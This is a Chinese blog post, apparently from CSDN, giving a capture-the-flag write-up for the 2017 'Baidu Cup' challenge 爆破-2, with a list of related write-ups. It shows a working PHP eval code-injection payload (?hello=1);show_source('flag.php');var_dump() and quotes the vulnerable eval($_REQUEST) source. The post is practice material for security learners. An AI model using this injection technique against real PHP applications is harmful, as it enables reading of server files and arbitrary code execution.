“百度杯”CTF比赛 2017 二月场-------爆破-2

最新推荐文章于 2022-07-03 17:56:40 发布
最新推荐文章于 2022-07-03 17:56:40 发布
阅读量830 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/81952219
版权

==============================

个人收获

1.如果eval是执行变量内容的话,可以进行内容拼接让eval执行其他的函数

 

==============================

题目:

 

尝试用?hello=$GOLBALS

发现flag没有在变量里面

但是那个eval( "var_dump($a);")

就要想方法利用下,因为按常理flag都在flag.php下我们只要能拿到flag.php里面的内容就能拿到flag

我们利用拼接让eval执行我们需要的函数

http://488e091106444c2fab369878c48265124b4bf199d529448b.game.ichunqiu.com/?hello=1);show_source(%27flag.php%27);var_dump(

这样跟eval函数拼接就变成了var_dump(1);show_source(%27flag.php%27);var_dump();

就可以导出flag.php的文件内容得到flag

 

大方子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“百度杯” CTF比赛 2017 二月场 — 爆破-1(10分)
qq_34106499的博客
01-14 592
1. 文件包含的利用:include()函数; 2. $_REQUEST函数的使用; 3. 正则匹配的使用:pre_match()函数; 4. eval()函数的利用; 5. 全局变量$GLOBALS的利用;
“百度杯”CTF比赛 2017 二月--web 爆破-2
hanjinrui15的博客
12-27 156
百度杯”CTF比赛 2017 二月--web 爆破-2基础知识PHP $_REQUESTPHP file()函数PHP show_source()函数PHP var_dump()函数PHP中@符号解题题目分析题目总结 基础知识 web题目主要考察的还是PHP的代码理解与运用,我们根据这道题目先学习一下需要了解的基础知识。 PHP $_REQUEST 以下是我从百度中找到的比较易于理解的解释: PHP $_REQUEST是用于收集HTML表单提交的数据,PHP $_REQUEST属于PHP的超级全局变量。
百度杯”CTF比赛 2017 二月场,Web:爆破-2
Pai_Space
07-03 100
百度杯”CTF比赛 2017 二月场,Web:爆破-2
“百度杯”CTF比赛 2017 二月场 Zone
feng的博客
09-12 660
这是涉及burp抓包,文件包含或者文件读取,目录遍历,和nginx的配置文件的一个题目。
“百度杯” CTF比赛 2017 二月--- 爆破2(10分)
qq_34106499的博客
01-14 384
1. file_get_contents()函数的使用; 2. file()函数的使用; 3. show_source()函数的使用; 4. php中执行linux系统命令的多种方法; 5. eval()函数的使用。
“百度杯”CTF比赛 2017 二月--web 爆破-2 writeup
会下雪的晴天
06-14 552
题目描述 解题思路 点击链接得到以下代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 尝试将hello变为全局变量(GOLBALS) 在URL后加?hello=$GOLBALS 结果: 得到FLAG 由第一步可知,flag不在...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF比赛中的常见题型-适合初学者
最新发布
08-17
CTF比赛中的常见题型--适合初学者
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
Rhme-2017:Riscure Hack Me嵌入式硬件CTF 2017-2018
05-16
**Rhme-2017: Riscure Hack Me 嵌入式硬件 CTF 2017-2018** 这篇文章将探讨Riscure Hack Me在2017-2018年举办的嵌入式硬件CTF(Capture The Flag)挑战赛。CTF是一种网络安全竞赛,参赛者通过解决各种技术问题来...
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目。
“百度杯”CTF比赛 2017 二月场——Web-爆破-2
Ifish的博客
05-07 1246
题目描述 解题思路 创建赛题,打开链接 提示说,flag不在变量中,看完代码,就想到,不在变量中,就应该在文件中了,使用get_file_contents函数,构造如下: http://f79f87d42ad840a8acdec9e8d8eb89dfb8844920bd6e4950.game.ichunqiu.com/?hello=file_get_contents(%27flag...
“百度杯”CTF比赛 2017 二月--web 爆破-3
hanjinrui15的博客
12-28 267
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
百度杯”CTF比赛 2017 二月场——Web-爆破-1
Ifish的博客
05-07 1198
题目描述 解题思路 打开链接 提示说flag在变量里,看到var_dump(),$$a时,就猜测是考察超全局变量GLOBALS 所以就构造http://7d30e96f64ea46cebb0bb8321544000282aff8f4efd34bb1.game.ichunqiu.com/?hello=GLOBALS 即可得到flag:flag{fa6d5cb6-9b98-4...
i春秋 百度杯”CTF比赛二月场) Misc&&web题解 By Assassin
热门推荐
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
i春秋 “百度杯”CTF比赛 2017 二月爆破-1、爆破-2、爆破-3
include_heqile的博客
09-06 1201
https://www.ichunqiu.com/battalion?t=1 爆破1 题目提示说flag就在某六位变量中 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); sho...
[Reverse] - 百度杯”CTF比赛 2017 二月-CrackMe-1
123
08-17 1460
环境:Windows XP 工具: IDA OD EXEINFOPE 0x00 查壳 0x01 分析 拖入OD,字符串查找看一看。 跟进去看就可以知道关键call了 0040196A . 48 dec eax 0040196B . 0F85 C4000000 jnz CrackMe1.00401A35 00401971 . B8...
“百度杯”CTF比赛 2017 二月-----爆破1
大方子
08-22 655
==================================== 个人收获: 1.正则匹配的只是(^ $ \w *) 2.php的GLOBALS作用 ==================================== 题目:   打开就是这个代码,分析下 php接受hello的参数,因为是request所有不管是post还是get都行 然后开始正则匹配    ...
百度杯”CTF比赛 2017 二月爆破2
weixin_43858799的博客
05-19 272
1、根据题目 flag不在变量中 所以爆破1中使用GLOBLAS的方法就不再实用 2、打开之后 还是一段代码 依旧是通过前端进行传参 3、这里没有出现$ $ a 所以就无法对输入的参数进行相应地运用 这里就要用到PHP中的 file_get_contents() 函数 4、我们通过URL传参 ?hello=file_get_contents(“flag.php”) 发现得到了stri...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值